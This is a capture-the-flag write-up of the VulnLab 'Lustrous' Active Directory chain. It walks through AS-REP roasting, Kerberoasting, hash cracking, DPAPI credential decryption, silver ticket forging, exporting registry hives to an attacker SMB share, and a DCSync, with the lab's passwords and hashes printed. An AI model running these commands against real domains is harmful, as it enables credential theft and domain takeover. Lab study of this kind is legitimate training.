POSTS

VULNLAB: Lustrous

Lustrous is a Hard-rated chain consisting of 2 machines on vulnlab. Cevering AS-REP roasts, Kerberoasts, the main lesson on this chain is to demonstrate how silver tickets can be used with service accounts in a Active Directory environment.

VULNLAB: Lustrous
2349 words · 12 min

Overview

  • Type Chains
  • OS Windows
  • Severity Hard
  • Creator xct
  • Release date 2021 Dec 25
  • IP 10.10.236.229, 10.10.236.230

Enumeration

Start the instance via Discord, wait around 5 minutes for the machine to start all services and let’s go:

image

Nmap

$ nmap -sCV -Pn -p- --min-rate=1000 -T4 10.10.236.229
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-05 19:18 JST
Nmap scan report for LUSDC.lustrous.vl (10.10.236.229)
Host is up (0.25s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21  11:50AM       <DIR>          transfer
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Negotiate
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
| tls-alpn: 
|_  http/1.1
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Subject Alternative Name: DNS:LusDC.lustrous.vl
| Not valid before: 2021-12-26T09:46:02
|_Not valid after:  2022-12-26T00:00:00
| http-server-header: 
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
|_ssl-date: TLS randomness does not represent time
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Negotiate
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Not valid before: 2025-02-04T09:43:29
|_Not valid after:  2025-08-06T09:43:29
|_ssl-date: 2025-02-05T10:22:14+00:00; -1s from scanner time.
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
52529/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • Found a Domain Controller for the lustrous.vl domain.
  • Non standard 21/tcp FTP port open
  • add LusDC.lustrous.vl, lustrous.vl in /etc/hosts
$ nmap -sCV -Pn -p- --min-rate=1000 -T4 10.10.236.230                                               
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-05 18:58 JST
Nmap scan report for 10.10.236.230
Host is up (0.25s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-05T10:02:03+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSMS
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusMS.lustrous.vl
|   DNS_Tree_Name: lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-02-05T10:01:24+00:00
| ssl-cert: Subject: commonName=LusMS.lustrous.vl
| Not valid before: 2025-02-04T09:43:32
|_Not valid after:  2025-08-06T09:43:32
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • Seems we found a workstation in the lustrous.vl domain.
  • Main open ports are SMB, RPC and also RDP.
  • add LusMS.lustrous.vl in /etc/hosts

SMB Shared folder (445/tcp)

Enumerate the SMB shares:

  • LUSDC:
$ nxc smb LusDC.lustrous.vl -u 'guest' -p '' --shares
SMB         10.10.236.229   445    LUSDC            [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB         10.10.236.229   445    LUSDC            [-] lustrous.vl\guest: STATUS_ACCOUNT_DISABLED 
  • Guest account is disabled and we can also noted that SMB is signing.

Let’s retry anonymously:

$ nxc smb LusDC.lustrous.vl -u '' -p '' --shares     
SMB         10.10.236.229   445    LUSDC            [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB         10.10.236.229   445    LUSDC            [+] lustrous.vl\: 
SMB         10.10.236.229   445    LUSDC            [-] Error enumerating shares: STATUS_ACCESS_DENIED

Not allowed.

  • LUSMS:
$ nxc smb LusMS.lustrous.vl -u 'guest' -p '' --shares 
SMB         10.10.236.230   445    LUSMS            [*] Windows Server 2022 Build 20348 x64 (name:LUSMS) (domain:lustrous.vl) (signing:False) (SMBv1:False)
SMB         10.10.236.230   445    LUSMS            [-] lustrous.vl\guest: STATUS_ACCOUNT_DISABLED 
$ nxc smb LusMS.lustrous.vl -u '' -p '' --shares  
SMB         10.10.236.230   445    LUSMS            [*] Windows Server 2022 Build 20348 x64 (name:LUSMS) (domain:lustrous.vl) (signing:False) (SMBv1:False)
SMB         10.10.236.230   445    LUSMS            [-] lustrous.vl\: STATUS_ACCESS_DENIED 
SMB         10.10.236.230   445    LUSMS            [-] Error enumerating shares: Error occurs while reading from remote(104)

Same than for DC, nothing but SMB is not signing, so SMB relay is possible.

LUSDC - Part I

FTP (21/tcp)

As anonymous login is allowed let’s dig into:

$ ftp -i anonymous@LusDC.lustrous.vl
Connected to LusDC.lustrous.vl.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50101|)
125 Data connection already open; Transfer starting.
12-26-21  11:50AM       <DIR>          transfer
226 Transfer complete.
ftp> cd transfer
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||50102|)
125 Data connection already open; Transfer starting.
12-26-21  11:51AM       <DIR>          ben.cox
12-26-21  11:49AM       <DIR>          rachel.parker
12-26-21  11:49AM       <DIR>          tony.ward
12-26-21  11:50AM       <DIR>          wayne.taylor
226 Transfer complete.
ftp> exit
221 Goodbye.

Found an interesting transfer folder with that seems some users folders

Let’s grab all:

$ wget -r ftp://anonymous:1234@LusDC.lustrous.vl/transfer
$ tree lusdc.lustrous.vl 
lusdc.lustrous.vl
└── transfer
    ├── ben.cox
    │   └── users.csv
    ├── rachel.parker
    ├── tony.ward
    └── wayne.taylor

6 directories, 1 file

Only ben.cox folder contains an interesting file

Check it:

image

List of Domain groups and 2 users

ASREPRoasting (ben.cox)

As we have 4 domain usernames, we try ASREPRoast attack without authentication to retrieve the Kerberos 5 AS-REP etype 23 hash of users without Kerberos pre-authentication required:

$ cat usernames.txt                  
ben.cox
rachel.parker
tony.ward
wayne.taylor

A bet on ben.cox ^^

$ nxc ldap lusdc.lustrous.vl  -u usernames.txt -p '' --asreproast ASREProastables.txt --kdcHost lusdc.lustrous.vl
SMB         10.10.236.229   445    LUSDC            [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
LDAP        10.10.236.229   445    LUSDC            $krb5asrep$23$ben.cox@LUSTROUS.VL:ebc0f1aac5c1965c670c7f92c4fb6e70$e064bf037db6b7749cc7e69aecbf219fee79f2c4a5a6b4377278bd6d2ac9c642493ffed15b905bb405f12e1974006857b673ba8846b90efb035379bc9b37744d029c9824e926ae7ea78a7755e7a8bbf3e956003c948cf3b6c52d0f998f48ad55edbbda7c7687fb299e5e454c593e152d0f6251dca498e8de603c276c8a7bb52274db208bd2a5bd9b135eaf8be0233725a038aef3caec6e9faa83543b595c3cfd32571ba337ec1135f34d731a0d1d49050d0583eb3d2b5d1bcd36780e447ebf8e6dbebdfb61fb33c3cb3277846b7dc5fb17462ddbad0fb139ca59a058d09b15a72e7ff289af7291d6d1fd

Found ben.cox’s hash (win my bet)

We double the stake and try to crack it with Hashcat:

$ cat ASREProastables.txt
$krb5asrep$23$samuel.davies@HERON.VL:7c9b58fb644a1dfadbb38c3650899858$fca65340c4ca8e3b5a6b8f5c4106fcf3d8736fbeda167a9c5e4d94bd6a4572585b23c72a21bffd3f6b6801c7287bd76a56ff057135002b3376c53728242d0a569656eb2611ae29538633d36b72e85403b7a8ca93d8276eb0de36fda15f7e7107fea231bd106eae229ed558f2639244de847af3ef6eeb6c24adfefd31edf0f64bd5a0531c11c2647d4b719b3d59dd3c434a81e280b3e3239f76811a73d21fff88eace0fdbc53d338f2c78402ca78d0a97b25597b7bcc6e7d6c303c73bd9a3b60896947b67873f22e5a65e6fc2a34b0f4c34c074424ff2f0ee392b85a9582241150fc5016c
$ hashcat -a 0 -m 18200 ASREProastables.txt /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
...
$krb5asrep$23$ben.cox@LUSTROUS.VL:ebc0f1aac5c1965c670c7f92c4fb6e70$e064bf037db6b7749cc7e69aecbf219fee79f2c4a5a6b4377278bd6d2ac9c642493ffed15b905bb405f12e1974006857b673ba8846b90efb035379bc9b37744d029c9824e926ae7ea78a7755e7a8bbf3e956003c948cf3b6c52d0f998f48ad55edbbda7c7687fb299e5e454c593e152d0f6251dca498e8de603c276c8a7bb52274db208bd2a5bd9b135eaf8be0233725a038aef3caec6e9faa83543b595c3cfd32571ba337ec1135f34d731a0d1d49050d0583eb3d2b5d1bcd36780e447ebf8e6dbebdfb61fb33c3cb3277846b7dc5fb17462ddbad0fb139ca59a058d09b15a72e7ff289af7291d6d1fd:Trinity1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$ben.cox@LUSTROUS.VL:ebc0f1aac5c1965c6...d6d1fd

Found ben.cox:Trinity1 (win the pot)

Kerberoasting (svc_web)

Retrieve the Kerberos 5 TGS-REP etype 23 hash using Kerberoasting:

$ nxc ldap lusdc.lustrous.vl  -u 'ben.cox' -p 'Trinity1' --kerberoasting kerberoasting.txt --kdcHost lusdc.lustrous.vl
SMB         10.10.236.229   445    LUSDC            [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
LDAP        10.10.236.229   389    LUSDC            [+] lustrous.vl\ben.cox:Trinity1 
LDAP        10.10.236.229   389    LUSDC            Bypassing disabled account krbtgt 
LDAP        10.10.236.229   389    LUSDC            [*] Total of records returned 4
LDAP        10.10.236.229   389    LUSDC            sAMAccountName: svc_web memberOf:  pwdLastSet: 2021-12-22 21:46:12.670282 lastLogon:2025-02-05 19:21:35.412091
LDAP        10.10.236.229   389    LUSDC            $krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$503334e62bb1e9cf03576984c97a0602$fac298840a042dd548f42e6ddf057626f189af62e0e7ec05bec4ce4253b5b40b25a4204f39e74781d4ad608d514508561e0a8f6097324058221b7a0b5ba9fa66cc402b58135bd68ad038c64a624c360c1eba1648922d48f658b9c5fbaa0ae77fe7e755ecac0a54170812f570c140c3ca0d1a95c2b4a4ea579a2b3f01ccad3c4013469b81a42b15e6e8cedb21502cada299dbdc3e92bbdfa3f2a03f29094314fd466326d03b81b87edf5bc46a3b0ec5cfa2cdc1952331ecfd93afb23e7406256b598479c4d77e5cce0bd1b14a78f08f32340ade441be2fd48ac98733a65ebf93ac9a3ab49a945087ca8ace5530e22175652f7366e6876d8ad434e0aa4d8ae2dfbbd26a67e426719221b001b6fb1d64c2fa1c75d34c92da3042e528903e9e35a182ee24a3c7426ace4ec5440a6c991051121882256ba31aa490de3c91c3f4ea7502b485143ba671515564a2acb296f41a06d175523000e04f06a3200734f7ec32e9c19573a2472158f8fcbaa459e131b946ef996bb537ce120b3cf6c0f33856d19d291a6a20e397f0a4f218711f98dc884409a4988ff3753e33adf6c44623f4bf617f63623e4b65abe161992269a847ce80de74919396b58be63b3a4a8e215e17c7a896f49017ce5d46a1790fb50ad456d9271b262da5934182e84b3adf66a1395257050b4b410a39f1f153bebcd72bd0f935308ec7d221e4c4f08c3caf640e384552c507ff562cb06c33700c2a38efd4d1ad48133b91fcf39a17a9d18752e55bc80117fc5833294adafefab1e1772905443acc5c4efe720d02df38821ae1b1ad01063e845bbc23d9b083f1b96e7ab3ced5b7c287d983549978f9d7d2f085000eddb52aea0446670e0a5238800f32e1417b3365ce05a8515aeb31410a21e87d433d3a3c9ac257bf38b303997b92d8271e36947be138b414678d8f5ea77394e6548fac9382610969d66697a17a523237a6f25d6d37fc6c9cdc9bd67297d38d3d320ec15c550d0401adafc676e0dbcab9bc887f2da556682c30c753434f30d23ec5ede38f215291074b949bf5657a6d3170c9b21a9bdc3f879b4b5979e074386d34da5d078587d209914f92fec5b85aefb167367eeef3181e605c707c0bab4b84ca486ae5d4167896dbbde786ceeddf4b5599ec65f89f721f123ac740fafe8988ea9a98890be6855c844c637a762807e7634fd8dd942dcf0f67643f7f6f47bd5886e967b7e2d5a57661f4077dd13a5cce6bab2cc5f9cf0123bdfb295d7596dc5725c10b97cf8a5159188d05d04d21f38391a255c7199599ef389424a01b9928a2f07229d219ed5ba104568adcda0e8eb05fd8f89381c1cafc2f975ed6911337f7435b4b769c37c8cc840ffaa702b313392656da372f7840da724337a8e314db24248ac82d7434d15ae51fcd5d9d87000ee7b444faf5cdfd57d45ba1ea4d61942c50bc5064a
LDAP        10.10.236.229   389    LUSDC            sAMAccountName: svc_db memberOf:  pwdLastSet: 2021-12-22 21:46:34.170590 lastLogon:<never>
LDAP        10.10.236.229   389    LUSDC            $krb5tgs$23$*svc_db$LUSTROUS.VL$lustrous.vl/svc_db*$e57893acaf1af21f3c70ac833ead0f12$45ab78d6c7309901bdbbd808655d546174369027bdac2fed8a4c46bb3f753701513d911b4bec2fbf1046b4b6ffded6a351374c22869d9fa4769bbc5917d562dbfd25489e98cbade267a28c8dc165c387d1e8f81a515554f0ec3fed862a7838ae94c2ff8047226de38768d4847a09de727998d4ccc11b876363b7c00fb677437b4d5b9fb59149d3acbb29a5b375490dd4c8cad30b581cb2dd9eebee335e86235ac0b1a2e4dd1d00772b1ed5dad136a5979e17e892329dbda947da2ef29b443fe277b0c0223077b90138de0baa84cea7da3e549d0bddc7b8595bb6afbbca4fc541f3ccf158df5e909a9232a0d4b785c144dcf713f98529f18d6bf6287b45660431f326606cc3a40f64c491ac51eeb7d24dfe4753b17289933a7424c6a1bac6340ae114dddc43da96c5b1f3a317c49825769876bcefd1e713180ca58a45ba8674282252b6eacac50b6689eb44767405bc02eb77cc14974b4cfcdc49deb3668e7294ea819f542f1f3194808f0d37bdea35a6e263a4647823dab8bf6f38707014d7a152faf886f6d7ff7efaadf3c156b2242da295c71b62b8cd860fb642f7fd20054a9ab535e79b1428c245e70c30380727b5d473a502b512955d770cdbdf186d5b977453f44b0df2b1f490b3bb76e30010dced650fdcd977b69988cbecfdd934172ed1305d1d6589d0229ec2e346f39685843e98ca412268ef55e1525d81aba88f8f6bb475361ca4c0ec425a92812895880fa63425dcde529cd8445684a3b15a458655a5c381f48eeec566275f4c0c488350256b86d1c8c315b601cac189bac2f0cc42f134c42907f34b427ab2d895a2d637d43b53a14bb56622d7573a2ab4deb0607870741def20a50863cb15a72d195fab81c4827918266bd2d1d02e5daa634012e0ceec0c1228baf27ce7aab102c268d368b1142a9c28cde3e35bd2ac9f2adc8a83192a90951a798c1c407efc88a005d8c918e3b0e8da8cb4dfa99071d38be3975040ed44737878af261f28598a308ea8e83d16d28c347d76cd52361293f1978d99e0eaa36cbd4d9032fa90d5d0cb8ff5713374f02c50e3144a75b83d8392d7f32469e84282ded5038a7e5a7df9cae04e89bb3bc34235ad3a463dcaeccdd803e3d49aca76c4060b5591577689130b3c849f2d4a9f17d01a2cd3ecac8bdf2a69f5383c09a12bb0c915619fcbc321d20820be9d1d5c51430595bb7fffd3da0bb91bea529fec5df2f5cfe484b898439ca94f561ba3e1cc9bb3d7fdeac0542986d6b9a2768d677e928736eb1215830af485388b0983171e928c6619e584e4b5c76ab1324f411ff19a20a597563c6140ca0873724ff65ce9bbd2d9cb31acaecb601a7b33784bee9498dd4dab0d366e404ffc0ed00405996aba74561d292f23d4401bf302530ce915849e8c444688b25cb7436ee7c3a6411650c18f1f9319a393bbcf2834e4ba

Found svc_web and svc_db hashes

Then try to crack them with Hashcat but only svc_web is crackable:

$ hashcat -a 0 -m 13100 svc_web.hash /usr/share/wordlists/rockyou.txt                                             
hashcat (v6.2.6) starting
...
$krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$503334e62bb1e9cf03576984c97a0602$fac298840a042dd548f42e6ddf057626f189af62e0e7ec05bec4ce4253b5b40b25a4204f39e74781d4ad608d514508561e0a8f6097324058221b7a0b5ba9fa66cc402b58135bd68ad038c64a624c360c1eba1648922d48f658b9c5fbaa0ae77fe7e755ecac0a54170812f570c140c3ca0d1a95c2b4a4ea579a2b3f01ccad3c4013469b81a42b15e6e8cedb21502cada299dbdc3e92bbdfa3f2a03f29094314fd466326d03b81b87edf5bc46a3b0ec5cfa2cdc1952331ecfd93afb23e7406256b598479c4d77e5cce0bd1b14a78f08f32340ade441be2fd48ac98733a65ebf93ac9a3ab49a945087ca8ace5530e22175652f7366e6876d8ad434e0aa4d8ae2dfbbd26a67e426719221b001b6fb1d64c2fa1c75d34c92da3042e528903e9e35a182ee24a3c7426ace4ec5440a6c991051121882256ba31aa490de3c91c3f4ea7502b485143ba671515564a2acb296f41a06d175523000e04f06a3200734f7ec32e9c19573a2472158f8fcbaa459e131b946ef996bb537ce120b3cf6c0f33856d19d291a6a20e397f0a4f218711f98dc884409a4988ff3753e33adf6c44623f4bf617f63623e4b65abe161992269a847ce80de74919396b58be63b3a4a8e215e17c7a896f49017ce5d46a1790fb50ad456d9271b262da5934182e84b3adf66a1395257050b4b410a39f1f153bebcd72bd0f935308ec7d221e4c4f08c3caf640e384552c507ff562cb06c33700c2a38efd4d1ad48133b91fcf39a17a9d18752e55bc80117fc5833294adafefab1e1772905443acc5c4efe720d02df38821ae1b1ad01063e845bbc23d9b083f1b96e7ab3ced5b7c287d983549978f9d7d2f085000eddb52aea0446670e0a5238800f32e1417b3365ce05a8515aeb31410a21e87d433d3a3c9ac257bf38b303997b92d8271e36947be138b414678d8f5ea77394e6548fac9382610969d66697a17a523237a6f25d6d37fc6c9cdc9bd67297d38d3d320ec15c550d0401adafc676e0dbcab9bc887f2da556682c30c753434f30d23ec5ede38f215291074b949bf5657a6d3170c9b21a9bdc3f879b4b5979e074386d34da5d078587d209914f92fec5b85aefb167367eeef3181e605c707c0bab4b84ca486ae5d4167896dbbde786ceeddf4b5599ec65f89f721f123ac740fafe8988ea9a98890be6855c844c637a762807e7634fd8dd942dcf0f67643f7f6f47bd5886e967b7e2d5a57661f4077dd13a5cce6bab2cc5f9cf0123bdfb295d7596dc5725c10b97cf8a5159188d05d04d21f38391a255c7199599ef389424a01b9928a2f07229d219ed5ba104568adcda0e8eb05fd8f89381c1cafc2f975ed6911337f7435b4b769c37c8cc840ffaa702b313392656da372f7840da724337a8e314db24248ac82d7434d15ae51fcd5d9d87000ee7b444faf5cdfd57d45ba1ea4d61942c50bc5064a:iydgTvmujl6f
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_we...c5064a

Found svc_web:iydgTvmujl6f

We check and can connect via WinRM to lusvm.lustrous.vl then we will pivot to the workstation.

LUSMS

DPAPI Secure String decrypting (Lustrous_User)

Searching for a flag without success, we found an interesting file in the desktop:

$ evil-winrm -i lusms.lustrous.vl -u ben.cox -p 'Trinity1'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ben.cox\Documents> ls ../Desktop


    Directory: C:\Users\ben.cox\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        12/26/2021  10:30 AM           1652 admin.xml


*Evil-WinRM* PS C:\Users\ben.cox\Documents> download ../Desktop/admin.xml
$ cat admin.xml 
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">LUSMS\Administrator</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
    </Props>
  </Obj>
</Objs> 

The presence of System.Management.Automation.PSCredential give us an hint. This tells us that it is a DPAPI credential - though it’s the secure string version of the credential instead of a credential blob.

DPAPI is a Windows-specific symmetric encryption of asymmetric private keys, and is used as a way to properly cache data without leaving them in plaintext around the machine. This is another method to storing credentials - as the data is encrypted using a key that is derived from the user’s logon secrets or credentials.

If we search on how to decrypt this password we can find the following posts:

So to decode the password we are going to run the following commands on LusMS:

*Evil-WinRM* PS C:\Users\ben.cox\Documents> $encrypted = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367"
*Evil-WinRM* PS C:\Users\ben.cox\Documents> $password = ConvertTo-SecureString -string $encrypted
*Evil-WinRM* PS C:\Users\ben.cox\Documents> $Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "LUSMS\Administrator",$password
*Evil-WinRM* PS C:\Users\ben.cox\Documents> $credential.GetNetworkCredential().password
XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF

Found LUSMS\Administrator:XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF

Then grab the flag Lustrous_User:

$ evil-winrm -i lusms.lustrous.vl -u administrator -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ..\Desktop\flag.txt
VL{40a034f5c60e429d1a210f09bd3c3548}

Secure Notes reading

We try to access to the web page http://lusdc.lustrous.vl as we saw during our enumeration that 80/tcp is open on the DC:

image

  • Right now it’s telling us that we do not have access to the website due to invalid credentials. But that’s odd right - it didn’t prompt us to enter in any credentials beforehand.
  • We are in presence of Kerberos authentication to HTTP.

Essentially, Kerberos authentication can be passed into HTTP headers based on the context of the current user that is trying to access it.

Service tokens are issued in the context of the user and they are injected into headers before accessing the site.

If the user has the correct header in relation to the service’s cache, they’ll be allowed access into the web service.

As we are local admin on LusMS, let`s check if we can RDP then try to access to this webpage:

$ xfreerdp /v:lusms.lustrous.vl /u:Administrator /p:'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF' /d:WORKGROUP /dynamic-resolution +clipboard

image

RDP access confirmed

Let’s try to access to the webpage:

image

An authentication page is pop up.

We authenticate using ben.cox’s credentials and access to the Secure Notes:

image

image

image

That confirmed the Kerberos authentication to HTTP

Previously during our kerberoasting attack, we found a service account name svc_web, we can guess based on the name of the account that this is the service account for the HTTP service.

Given that now we have access to that account, we can technically request a valid TGT to HTTP for any user on the domain.

LUSDC - Part II

Silver Ticket

You can request it for any user but better to select a juicy target.

Run SharpHound then ingest to BloodHound Community Edition, we found the domain usertony.ward. He is a member of the Backup Admins group, which can hint at the fact that they might have SeBackupPrivilege enabled locally.

image

We got his SID too:

image

Since we now have the password of svc_web, we can convert it into the NTLM hash using python:

$ python3                  
Python 3.12.8 (main, Jan 11 2025, 09:42:09) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib
>>> password = "iydgTvmujl6f"
>>> password_bytes = password.encode("utf-16le")
>>> md4_hash = hashlib.new("md4", password_bytes).digest()
>>> ntlm_hash = md4_hash.hex()
>>> print(ntlm_hash)
e67af8b3d78df5a02eb0d57b6cb60717
>>> ctrl D

Get a ticket of tony.ward:

$ impacket-ticketer -nthash E67AF8B3D78DF5A02EB0D57B6CB60717 -domain-sid S-1-5-21-2355092754-1584501958-1513963426 -domain lustrous.vl -spn HTTP/lusdc.lustrous.vl -user-id 1114 tony.ward
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for lustrous.vl/tony.ward
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in tony.ward.ccache

Then inject it to our global env variable:

$ export KRB5CCNAME=tony.ward.ccache                                          
$ klist
Ticket cache: FILE:tony.ward.ccache
Default principal: tony.ward@LUSTROUS.VL

Valid starting       Expires              Service principal
02/05/2025 22:05:49  02/03/2035 22:05:49  HTTP/lusdc.lustrous.vl@LUSTROUS.VL
	renew until 02/03/2035 22:05:49

SeBackupPrivilege Remotely exploiting (Lustrous_Root)

We now have the credentials of “Backup Admins” which are in the “Backup Operators” group. Unfortunatly we do not have a shell on the target system though.

In that situation, we have many ways to exploit SeBackupPrivilege.

Way1:

Start a local SMB server pointing to a share, to be able to download the SAM, SYSTEM, and SECURITY databases from the DC:

$ mkdir share
$ impacket-smbserver share share/ -smb2support

We use impacket-reg to access the registry remotely and pull the SAM, SYSTEM, and SECURITY databases from the DC:

$ impacket-reg lustrous.vl/'tony.ward':'U_cPVQqEI50i1X'@lusdc.lustrous.vl save -keyName 'HKLM\SAM' -o \\\\10.8.4.253\\share
$ impacket-reg lustrous.vl/'tony.ward':'U_cPVQqEI50i1X'@lusdc.lustrous.vl save -keyName 'HKLM\SECURITY' -o \\\\10.8.4.253\\share
$ impacket-reg lustrous.vl/'tony.ward':'U_cPVQqEI50i1X'@lusdc.lustrous.vl save -keyName 'HKLM\SYSTEM' -o \\\\10.8.4.253\\share

After it’s finished, we should have all 3 files in the respective directory share we used for the SMB server.

We can now use these 3 files to dump the machine account NTLM hash for LUSDC$:

$ impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL

Found LUSDC$:22e9b1adf4d6ee35a728b215795a8b47

Information:

  • We dumped also the local administrator hash, if the domain administrator password would be the same we would be done here, but unfortunatelly the local admin and domain admin have 2 different passwords.

The NTLM hash for the LUSDC$ has the username identifier $MACHINE.ACC. Although these names are different, this is the same user.

Now that we have credentials to the machine account, we can use impacket-secretsdump once more to dump the Administrator user’s NTLM hash (to perform the DCSync attack on the lusdc host):

$ impacket-secretsdump lustrous.vl/'LUSDC$'@lusdc.lustrous.vl -hashes ':22e9b1adf4d6ee35a728b215795a8b47' -just-dc-user Administrator

Found Administrator::b8d9c7bd6de2a14237e0eff1afda2476

Then grab the flag Lustrous_Root:

$ nxc winrm lusdc.lustrous.vl -u 'administrator' -H 'b8d9c7bd6de2a14237e0eff1afda2476' -X 'type c:\users\administrator\desktop\root.txt'
WINRM       10.10.236.229   5985   LUSDC            [*] Windows Server 2022 Build 20348 (name:LUSDC) (domain:lustrous.vl)
WINRM       10.10.236.229   5985   LUSDC            [+] lustrous.vl\administrator:b8d9c7bd6de2a14237e0eff1afda2476 (Pwn3d!)
WINRM       10.10.236.229   5985   LUSDC            [+] Executed command (shell type: powershell)
WINRM       10.10.236.229   5985   LUSDC            VL{5384a9f4752602dd54f4c4850979da0b}

Way2:

Globally same processus that Way 1 but we use the BackupOperatorToDA tool to dump the SAM file from the lusdc and export it on the remote share.

$ git clone https://github.com/mpgn/BackupOperatorToDA.git

Then compile it with Visual Studio.

Then uploaded the tool to the rdp session, and executed it with the necessary parameters (don’t forget to start your local SMB server first):

PS C:\temp> iwr http://10.8.4.253/BackupOperatorToDA.exe -outfile BackupOperatorToDA.exe
